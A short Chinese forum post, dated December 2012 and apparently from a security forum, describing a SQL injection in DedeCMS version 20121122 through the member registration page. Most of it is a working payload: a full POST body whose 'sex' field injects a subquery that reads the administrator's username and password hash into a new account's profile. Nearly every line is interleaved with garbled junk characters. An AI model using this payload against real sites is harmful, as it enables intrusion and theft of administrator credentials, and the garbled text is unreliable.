dedecms版本 20121122
; ?1 e* @2 Y8 F" x% r$ g i6 v' d: \3 n8 w9 B
需要magic_quotes_gpc=Off
/ F; u: r2 u M6 R/ r* g# b9 `
应该是没有什么大危害的漏洞./ q/ [& E0 f; c% Z, P
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.1 C$ w! j2 A0 L s% R! q) l& Q
7 T2 q f. r' y0 h
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的./ y, u2 }+ N, F+ M# B- @
POST提交以下数据,其实不用POST提交的,这样隐蔽点." b" S: H) x, k: q. Y# v+ _9 Q
% K+ a1 i# Y( N& y5 @http:///de/member/reg_new.php5 ]2 E& e+ z. x2 Y7 Q9 c
, \0 h* N5 x5 M( I9 M" g
POST
3 p) N" s1 W% B6 O, O! X, I% ]2 O
# F3 g: [% h' i4 w6 Kdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
' \' }! g3 Q0 i- i! [1 ~0 l6 l
7 e: j1 Z& i0 s& l. M7 I成功注册后,头像处里面有好玩的信息.
" z. S0 a. J5 r% q
, B4 i. t8 f. Q+ s |
发表于 2012-12-5 10:03:32
收藏
支持
反对